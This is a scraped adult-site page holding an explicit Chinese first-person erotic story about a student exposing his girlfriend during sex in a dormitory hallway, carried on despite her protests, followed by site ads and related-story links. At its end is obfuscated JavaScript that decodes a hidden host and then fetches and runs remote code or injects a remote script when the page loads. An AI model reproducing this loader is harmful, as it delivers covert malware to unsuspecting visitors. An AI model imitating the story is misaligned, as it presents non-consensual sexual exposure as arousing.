返回

那些年,我和我的大学女友作者savier25636

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

那些年,我和我的大学女友



字数:6673

序其一

在还没有把西元千位数由一换成二的十几年前,网路并不像现在如此方便和发达,想看个A片也要靠抓个几天的P二P或是有在学校住宿的同学互助CD-R,每次上网前还得忍受那「哔叽哔叽」叫的五六K数据机。

BBS大流行,大家还会为了「元老」或是「勇者」的称号而不停上下线来累积上站次数或经验值,CALL机正经歷汰换,小海豚跟孔雀机还没横行,更别说那天价的数位相机。想当然尔,也没有春满四合院来分享心得或是学习各位暴露女友的精随。

回头想想,我大概就是从大学那血气方刚,刚满十八岁,贺尔蒙正旺,又不小心交到一个天使脸孔、魔鬼身材的女友,加上无心之下接触到元元图书馆而开始慢慢有露出女友的喜好。

先说说我的女友,就称她为小贝吧(这是我后来对她的昵称)。

其实我们在高中就认识了,她是小我一届的学妹,在某个机缘下接触到他们班上的同学们,又发现其实和她家住得很近,而慢慢熟起来。当时我对她的第一印象是:「好可爱的女生啊!」(没错,当年,我还是一个看女生会先从脸看起,最后才看到胸部的少年)

清清纯纯,白皙透亮的皮肤,有一点点高的额头,透过书呆子眼镜却还是可以看到水灵水灵的微翘凤眼,不挺不塌配上那张脸刚刚好的鼻子,还有一对透露出一点点性感的小丰唇。如果要找哪个明星来比对的话,大概就是曾从日本红到台湾的松浦亚弥(社长)了吧!

至于高中时期我和她之间的情色关系也仅只有视奸加脑补这种小儿科而已。倒是有一次一起搭拥挤的公车放学时,「不小心」发现手臂上靠着的温暖胸部是如此有份量(后来知道她高中比较瘦时是C罩杯,大学有到D加)。

利用那十三公分的身高差距往热度的来源看去,竟给我发现一条从锁骨中间往下延伸,最后消失在靛青色连身背心裙上缘的深邃事业线,加上透过薄薄两层制服传来随着公车前进时震动的柔软,还有因为受到刺激挤压的轻微喘息,这一点点触觉和视觉的刺激,就足以让当时未经世事的我撑起了不小的帐篷。

不过,我们的进展就仅止于偶尔的遐想还有放学一起搭车回家的偶遇,中间也因为转学而断了音讯两年。

是缘份吧,我和小贝的再次相遇并进入热恋,就发生在重考后升大学那三个月的暑假,从一次摩托车的错身而过,加上又很巧地申请上同一间位在台中的大学,所以我们在踏进大学门口之前,就已经是一对非处男非处女的情侣了。
序其二

大一新生就外宿其实有好处也有坏处,坏处就是会跟班上一部份人比较少互动,想求人帮忙在期考时救个命会比较不好意思;当然好处就是除了因为教授要点名而逼不得已去上课的时间外,可以尽情地翘课,把所有多餘的时间都花在钻研电动和练习做爱技巧上。

小贝申请到的是夜间部,所以几乎每天都可以睡到饱,我的话,反正就算有睡饱也不会出现在学校里。还像是火上加油地特别为了怕无聊,选了离我们学校较远的另一所大学(附设)夜市的附近租套房。

而女友在当新鲜人的第一年是住学校宿舍,不过也因为从第一天开始就有我这个男友在身边,一年下来,她的室友们可能只有在她需要回房间拿课本才见得到人影,倒是她们也都很配合地会在晚点名时帮忙挡一下。

因为如此,本来就应该要熬夜玩乐的大学生活,准备了十八年,怎么都用不完的体力,加上自己现在回想起来都很羡慕的下半身回復能力,除了必备的唱歌喝酒打篮球外,两个主业是学生,副业算从事「性开发工作者」的笨蛋情侣,慢慢从只会传教士体位的卒仔,进化成就算天不时地不利人不合也可以随兴插入的淫兽淫娃。

其实有一个学生女友的好处就是,配合度比较高,更何况是两人一起摸索,从中找到的乐趣更是现在慢慢步入中壮年所体会不到的。

其中我也因为接触到小小大男人的文章,开始尝试许多各式各样的调教,从最简单的室内露出,到塞跳蛋出门、野炮、脱衣扑克、网路自拍等等,着实为我的大学四年生活里添上了许多属于二十一禁的荒淫事蹟。


(一)

不是要吊各位看倌的胃口,但还是想要在进入故事之前先来说说当年可是经过的人都会回头一望,相当令人羡慕的女友身材。外貌上应该大家有个底了,不过讲到那藏在刚由制服转为便服包覆的身体曲线,即使现在想起来还是会不禁心跳加快。

穿上高跟鞋也不会给人带来压迫感,靠在肩膀上刚好可以给人小鸟依人感觉的标准亚洲人身高一百六十公分,用大家最习惯的头身来当比例的话,小贝可以算是足以让人称羡的七头身吧!这样的身材比例也很识相的配上一双只有大腿微微丰腴的长腿,让她穿齐屄小短裙出门时也可以信心满满。最重要的,就是连女性同胞也会时常一问再问,而男性同胞总是会开玩笑说「你是整的吧?」的丰满胸部了。

为了小贝的胸部,我得特别拉出两段来好好炫耀一番。刚进大学时,她的体重只有4三公斤,但是胸前两团柔软的乳房就是平均以上的C罩杯。后来经过我每天的按摩,还有透过属于大学生主食那许多有打生长激素的食物加持下,毕业时她买的胸罩已经是清一色D罩杯了,甚至在生理期那几天还会变成会有点紧的小E。

不过光是大的话并不足以需要如此矫情的写上几百字,那最主要的原因,就是把「年轻就是本钱」乘上十倍的集中坚挺和可以跟两个七-一一大烧包相比的浑圆了。

不要说是用乳沟夹原子笔了,夹个直径四公分的棒状物都是小CASE。而「你的胸部是怎么保养的啊?」这类的问题也已经是她回答到不想回答的家常便饭了。还有最后的一点,应该说是没有多少人亲眼看过的「两点」。小贝的乳头算是小巧型,而且是像H动画里会因为受刺激或是动情而慢慢变尖挺的那种,搭配上以乳头为中心半径一公分淡淡褐色的乳晕,我想只要是男人都会有想马上吸一口的衝动。

带点稚气又不失性感的脸孔,三三/二4/三4的三围,小腿比大腿稍长的美丽双脚,加上老天爷也很识相地给了跟她娃娃脸非常相配的声音。如果当时有发明童顏巨乳女神这个词的话,小贝的BBS昵称应该第二天就被站长利用不当执行流程改掉了吧!

************

接下来就是说故事时间了。我大一租的地方,是一栋总共六层楼、里面全都是学生套房的大楼,每一层都是由电梯及楼梯间延伸出去只有两臂宽的狭长走廊构成,没有气窗的长廊两边则是一间间紧邻的学生套房,也特别设计让门不会直接对着门而是有一点角度。

我住在六楼最边间。所以只要不直接走到我的房门口,即使是对面邻居也看不到里面的情况。不过也是因为最边间的缘故,通风不是很好,每次洗完澡都得打开房门让空气流通来赶走浴室里那台没有什么用的抽风机留下来的水蒸气。
我们的第一个故事背景就是这个在普通不过的加上一点点设计不良的学生套房里,小贝狮子座开放的个性加上一点点天然呆属性,更让我在接下来四年的调教过程省了不少事。而她第一次嚐到露出的刺激感,也就完全在是没有经过大脑的情况下发生的。

故事的时空背景,就是我们在大学里渡过的第一个应该为许多人留下深刻的印象的炎夏。小贝和我住的台中地区当然也不例外。正因为如此,整个超过六个月长的夏天时光里,我们在房间里几乎都不会穿衣服。想想看,孤难寡女共处一室都没有人会信只是泡茶聊天,更不要说是裸男裸女待在只有床跟电脑书桌的套房里了,做爱于是成为了我们最喜欢的共同运动。

事情就发生在一个月不黑风不高的夏日夜晚,我全裸地躺在床上看《软体世界》研究电动攻略,而小贝刚从学校上完课回来,一进门就把已经逋不太住她丰满胸部的背心脱掉,接着连胸罩也一併掛在椅背上,当然接下来就是看着一个半裸的小美女边摇屁股边把牛仔短裤从蕾丝上甩开。她手插着腰,任凭斗大的汗珠从乳沟间滑下到平坦的小腹上。「热死我了!」她用半撒娇的声音抱怨道。
「那你先去洗澡吧!」我放下杂誌,用漫不经心的声音回答道,而下半身也因为眼前怎么都看不腻的美景半充着血慢慢硬挺起来。

「喔!」小贝便背对着我翘起雪白的屁股把蕾丝内裤脱下放到洗衣篮,接着就边哼着歌走进浴室里打开莲蓬头。我也很不疾不徐地重复同样动作后(除了没有翘着屁股),跟着打开浴室门想一起和全裸美女享受久「汗」逢甘霖感觉。
边带着邪恶的微笑边想着如何用泡泡搓揉她的身体便打开门,来的却是一声「你干嘛啊?」跟着马上被莲蓬头的水喷了一脸。当时的我们才在一起三个多月,虽然不该看的都看过了,但小贝还是没有习惯一起洗澡,除了我老是趁机会摸东摸西外,我猜大概是为了那最后的一点点矜持吧!

当然,最后她还是半牵半就地在我「唉呀,没有关系啦宝贝」那种又拖带拉的攻势下让我得逞。要知道,当年热情如火的我是绝对不会放过在亲热时间之外摸遍她身体每一寸肌肤的任何机会,更何况是在那小小浴室一起洗澡的时间!
我先洗完澡出了浴室,在里面摸一摸也让时间耗到晚上十点多了。接着便很自然地把房门打开,走廊外面也只有不知道哪一间透过厚重铁门传出来的小小音响声。约莫不到十分鐘,女友打开浴室门身上没有任何遮蔽物地走了出来。
「你神经病啊!开着门干嘛?」她挺着光溜溜的屁股看到大开的铁门外昏暗的走廊后对我兇巴巴的说。

「很热耶!洗完澡本来就要开点们透气啊!」又坐回床上看杂誌的我回答。
「那你也不用全部打开吧?」

「唉呀,没关系啦,对面的好像也不在,没有人会走过来啦!」天然呆属性顿时发挥到最大效力。

之后就看到连内裤都没有穿的小贝小心翼翼地从门边探出头打探了一下,边向右方楼梯间的方向望去边说道:「好像真的没人耶!」

就是在这个MOMENT,我心中突然扑通了一下,自己的女友在全裸的状态下一隻脚踏在门外,如果从楼梯转上来角度应该可以看到她整片的锁骨和一半的左乳房,只要再出去一点点,说不定连乳头都看得到。不过看到这个场面,我不但没有阻止女友要她进来一点,反而感觉到下半身似乎又有了充血反应。
我想暴露女友的种子就是在那个时候种下的吧!

头发还半湿的小贝站在明亮的房间内,背对着敞开的门,边拿毛巾擦头向我走过来,当然身上还是一丝不掛的。不过这时候我的注意力却不是在她身上,而是对着那安静的走廊。胸口感觉到越来越紧绷,心跳也开始加快,一种不知道从哪里浮上来的兴奋渐渐佔据了我的本来就没有多少的理性。

接下来所发生的事情应该用下半身都猜得到了。

「来吧,宝贝。」于是我把女友手上的毛巾拿下往旁边一甩,接着顺势把她拉到床上。也不顾「干嘛啦,头发还湿的耶」的抱怨声就往她小小的丰唇上亲了下去。左手也立即不安份的开始搓揉还因为热水餘温而略成粉红色的大奶,右手更是熟练地往下面的桃花源探去。丰厚的阴唇上本来就没有任何阴毛,算是半个白虎,要找到她的阴蒂更是毫不费力。

小贝是属于非常容易湿的体质,而且不只是里面湿,兴奋的时候淫水甚至会流到大腿上。而且她只要是发了情,眼神就会开始迷茫,嘴巴也会微张,这个时候你要对她做什么都可以,如果还刻意忍住不把肉棒插进去继续逗她的话,「淫娃」这个词可能快要不够形容这个在人前天真烂漫、在家里却是摇着屁股用又甜又腻的声音对你说「来插我嘛」,顺便自己用手指搓揉着阴蒂的放荡小恶魔了。
刚开始爱抚时,小贝还因为不习惯又没穿衣服地在这样房门大开的半开放空间里裸露,但是就如我说的,不用两分鐘,她的小穴已经开始氾滥,也随着刻意压低的喘息声闭上眼睛,就好像是只要自己看不到别人也看不到她一样。

我看她已经湿成这样,而且自己忍不住了,按着传教士体位的第一动作操枪上阵,把我已经挺到半天高的肉棒对准她的小穴前进。但在进入第二动作之前,我不但没有直接给她的痛快一次插入,还刻意用龟头在阴蒂上来回摆动。这时小贝再也忍不住挤压在喉咙的声音而「嗯……啊……啊……」地呻吟了出来,屁股也跟着我肉棒来回摆动的频率上下摇晃。

「快点啊,你不是要插我吗?我都已经湿到床单上了。」女友张开大腿带着狐媚的眼神看着我,似乎门有没有关着早已不在她的思考范围里,一心只想着用大肉棒填满肉体的需求。此时我再也忍不住早就爆发的衝动,把抖动的龟头埋入粉红的肉瓣中间,因为受到爱液的充份润滑,我的肉棒在完全没有任何阻碍下直接顶到了小贝的子宫颈。

「嗯啊!」女友因为突然的强烈刺激而放声叫了出来,声音大到甚至还可以在我们窄小的房间里从走廊的共鸣听到一点回音。我看不止这层楼的人可以听得到,说不定连楼下都可以感受音波反射在耳膜里的震动。不过正享受着鱼水之欢的我们哪有时间管那么多,我继续着活塞运动,她也用身体迎合着肉棒的衝刺。
「啊……啊……啊……好……好……」女友逐渐开始解放仅存的羞涩,我也感觉到比最先进的飞机杯还要舒服的名器开始不断在肉棒上蠕动,佈满淫水的阴唇摩擦肉棒而发出「噗滋、噗滋」的淫水声,还有小贝光是用听的都可以让男人射精的叫床声充斥着整个房间。如果这样的美景当前,还有人说自己的五官是用来遵循孔子教诲的话,我可能会马上用精子喷他一脸。

说到喷精,酸酸痒痒的感觉在下半身有越来越强的趋势,但我并不想要太快结束这场战役,于是我把忘情的女友抱了起来,让她用骑马式主导性爱的节奏。
其实女上位也是我最爱的姿势之一,因为除了可以看到小贝上下晃动的巨乳外,想到这个可爱女人在自己的身体上为了寻求做爱的欢愉而自己摆动腰肢,才更是让人无可自拔。

本来我们是背对门口,但把女友抱起来之后,现在她是完全以赤裸的胸部对着没有遮蔽的大门。如果有无聊人士听到声音走过来看的话,就会马上看到一个小淫娃正搓揉着自己的大胸部在征服她的男人。后来想想,因为是晚上,所以只要有人从楼梯间上来准备回房间,就一定会看到我们这边很莫名其妙由室内发出来的灯光,加上不时传来的淫叫声,谁不会有兴趣摸过来瞧一瞧啊!

不过那也仅只是「后来想想」,当时只顾着干女友,哪管有没有谁会上来干嘛。甚至,我还做出了在那之前从来没想过的举动……

接着我让小贝从我的身上起来,她也很有默契的知道自己该把趴着像隻狗一样把屁股跟淫穴抬到刚好我可以利用床跟地板高低差站着插入的高度。

当我再度进入她的身体时,从她的反应我可以马上知道,现在眼前用最羞耻的姿势被肉棒玩弄着还自己用手搓着阴蒂的女人,已经发情到大概即使有三个男人轮流插入也不会发现的状态了。

于是,就像心中刚刚觉醒的恶魔佔领了一样,我突然从后面抬着小贝的腰,把她从床上拉下来,让从头到脚都充满着性感的全裸美女对着门口,开始用力撞击起来。

「啪!啪!啪……」随着每一声臀肉发出的声响跟持续不断的呻吟,小贝也被迫随着重心一小步一小步的往门口走去。

当我意识到时,女友已经是双手张开抵着门框,头早已伸出到走廊上,嘴巴轻喊着:「不要……啊……不要……会被看到……啊……」这时我的兴奋程度可能比跟我想像中中到大乐透还要强上几百倍。

「我就是要让大家看你淫荡的样子啊!」屈服在淫魔的威严下,我不仅没有因为女友的抱怨而打住,还亲声地在她耳边说道。

「怎么……啊!」没等她说完大概猜也猜得到的抗议句型,我又用力挺了一下屁股,这一下可是把女友整个推到走廊对面的墙壁上。走廊上虽然没有开灯,但是靠房间里发出来的光,一000度近视都可以看到两个肉虫在不可思议的地方进行生殖行为,而且其中一个还是没有一00分也有九五分的大美女。

就这样,我边撞击着雪白的肉臀,边用手肆意地抓揉在前面晃动的巨乳,小贝也因为双手得靠着墙壁支撑两个人的重量而完全无法抵抗,一齣再也淫浪不过的真人A片就在住满大学生的套房大楼走廊上开始上演。

「啊……啊……嗯……啊……不……快……快……啊……」

也许是因为太过刺激,淫水都快流到地板上而早已语无伦次的小贝很快就达到了高潮,受到缩紧的阴道包围,我很快地也有了要射精的感觉。而接下来的动作即使现在想起来也会觉得我是哪根筋不对了。

我不但没有因为小贝到了高潮全身松软下来而放过她,反而把她往楼梯间的方向一转,并把双手往后拉,让她的身体呈一个完美的S形,只是S型的一端连着一根胀大到十八公分的肉棒。

就像是对着无形的摄影机一样,我开始进行最后的衝刺。用尽每天仰卧起坐锻鍊出来的腰力对着丰满屁股猛力一顶再顶。女友也完全放弃了一开始的抗拒,放任不断摇晃的胸部在空气中留下淫糜的气味。

「我要射了!转过来!」终于忍不住射精的衝动,我放开女友的手让她可以转身面向我,小贝也立刻蹲下,让我把年轻力盛的精子喷在她美丽的胸部上。
说巧也真不巧,就当我享受完那十秒的爽快时,不知道哪里突然传出来一声「干,卡细声啦!」(台语:小声一点啦)也是这一声咒骂,让我跟女友像是热锅里的虾子一样,胀红着双脸弹回房间里。

坐在房间的地板上,地上除了淫水还有慢慢滴下来的精液,在一阵寂静里,我们失了神呆呆着看对方好几秒,然后突然爆笑了起来。接着我把门关上,边帮小贝用卫生纸擦胸部上的激情残留物边说:「好不好玩啊?下次再来一次吧!」
没想到小贝不是用生气的语气,而是用带着靦腆微笑的招牌撒娇方式回答:「神经病,你去死啦!」

此时我们小小房间从浴室里跑出来的雾气早已透过另外一头的落地窗散去。用铁窗围住半身高水泥墙的小小阳台上,正浮着很多电视连续剧在每一集结尾都用上的两个字——

「待续」。

[本帖最后由7788yoke于编辑]

评分
相关推荐
3.0分

3.0分 那些年我上过的大学女孩之洋作者zuoluojianke完574

3.0分

3.0分 那些年我上过的大学女孩之楠作者zuoluojianke完734

3.0分

3.0分 那些年我上过的大学女孩之倩作者zuoluojianke完e7b

3.0分

3.0分 【那些年我上过的大学女孩之洋】【作者:zuoluojianke】【完】3ae

3.0分

3.0分 【那些年我上过的大学女孩之楠】【作者:zuoluojianke】【完】fd1

3.0分

3.0分 【那些年我上过的大学女孩之倩】【作者:zuoluojianke】【完】da2

3.0分

3.0分 那些年我上过的大学女孩b4a

3.0分

3.0分 那些年我上过的女人1-3作者:shiyile4b

3.0分

3.0分 那些年我上过的大学女孩(2)f9e

3.0分

3.0分 那些年跟我一起做爱的女孩作者rain98751313c

3.0分

3.0分 我和刘阿姨那些事【完】(作者:大禹治酒)4a5

3.0分

3.0分 【回忆那些年,我的初恋】【作者:不详】【完】f6d

3.0分

3.0分 我和那些女人的那些事6ea

3.0分

3.0分 我和那些女人的那些事6ea

3.0分

3.0分 那些年我上过的大学女孩之洋8c7

3.0分

3.0分 那些年我上过的大学女孩之倩749


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};